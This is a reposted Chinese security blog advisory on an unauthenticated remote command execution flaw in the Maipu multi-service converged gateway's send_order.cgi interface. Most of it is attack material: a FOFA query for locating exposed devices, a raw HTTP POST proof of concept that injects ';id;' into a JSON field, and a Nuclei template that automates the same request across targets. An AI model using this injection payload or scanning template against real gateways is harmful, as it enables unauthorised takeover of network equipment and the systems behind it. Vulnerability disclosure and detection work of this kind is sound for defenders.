迈普多业务融合网关send_order.cgi远程命令执行漏洞【附poc】

admin 2024年7月2日07:48:58评论6 views字数 1188阅读3分57秒阅读模式

 

一、漏洞描述

迈普多业务融合网关是迈普通信技术股份有限公司自主研发的有线无线融合多业务网关,拥有有线无线网络一体配置、用户互联网网关、精准流控、上网行为管控、上网行为审计、网络安全防护、IPSec VPN分支互联、智能选路等强大功能,并支持对接迈普云平台,实现远程运维和集中管理。其接口send_order.cgi存在远程命令执行漏洞,未经身份验证的恶意攻击者可以任意命令,进而控制服务器系统。

迈普多业务融合网关send_order.cgi远程命令执行漏洞【附poc】

二、网络测绘

fofa:title="迈普多业务融合网关"

迈普多业务融合网关send_order.cgi远程命令执行漏洞【附poc】

三、漏洞复现

测试执行id命令

迈普多业务融合网关send_order.cgi远程命令执行漏洞【附poc】

四、漏洞检测poc

POST /send_order.cgi?parameter=operation HTTP/1.1Host: 0.0.0.0Accept: */*Accept-Language: zh-CN,zh;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Length: 40{"opid":"1","name":";id;","type":"rest"}

五、Nuclei 检测POC

id: Maipu_send_order_cgi_RCEinfo:  name: Maipu_send_order_cgi_RCE  author: hamal  severity: high  description: 迈普多业务融合网关send_order.cgi远程命令执行漏洞  reference:    - https://  tags: 微信公众号(实战安全研究)http:  - raw:      - |-        POST /send_order.cgi?parameter=operation HTTP/1.1        Host: {{Hostname}}        Accept: */*        Accept-Language: zh-CN,zh;q=0.9        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36        Accept-Encoding: gzip, deflate        Content-Length: 40        {"opid":"1","name":";id;","type":"rest"}    matchers-condition: and    matchers:      - type: word        part: body        words:          - '"msg":"ok"'      - type: status        status:          - 200

 

原文始发于微信公众号(实战安全研究):漏洞复现 | 迈普多业务融合网关send_order.cgi远程命令执行漏洞【附poc】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月2日07:48:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   迈普多业务融合网关send_order.cgi远程命令执行漏洞【附poc】http://cn-sec.com/archives/2907327.html

发表评论

匿名网友 填写信息